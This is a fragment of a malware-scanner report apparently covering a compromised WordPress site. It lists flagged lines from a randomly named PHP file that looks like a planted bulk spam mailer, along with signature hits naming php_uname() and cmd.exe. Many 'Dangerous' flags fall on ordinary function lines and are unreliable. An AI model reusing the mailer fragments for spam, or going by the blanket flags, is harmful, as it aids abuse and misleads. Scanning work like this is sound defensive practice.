</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_200").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/5N9XuoLpAvh.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:51:10</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_201" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
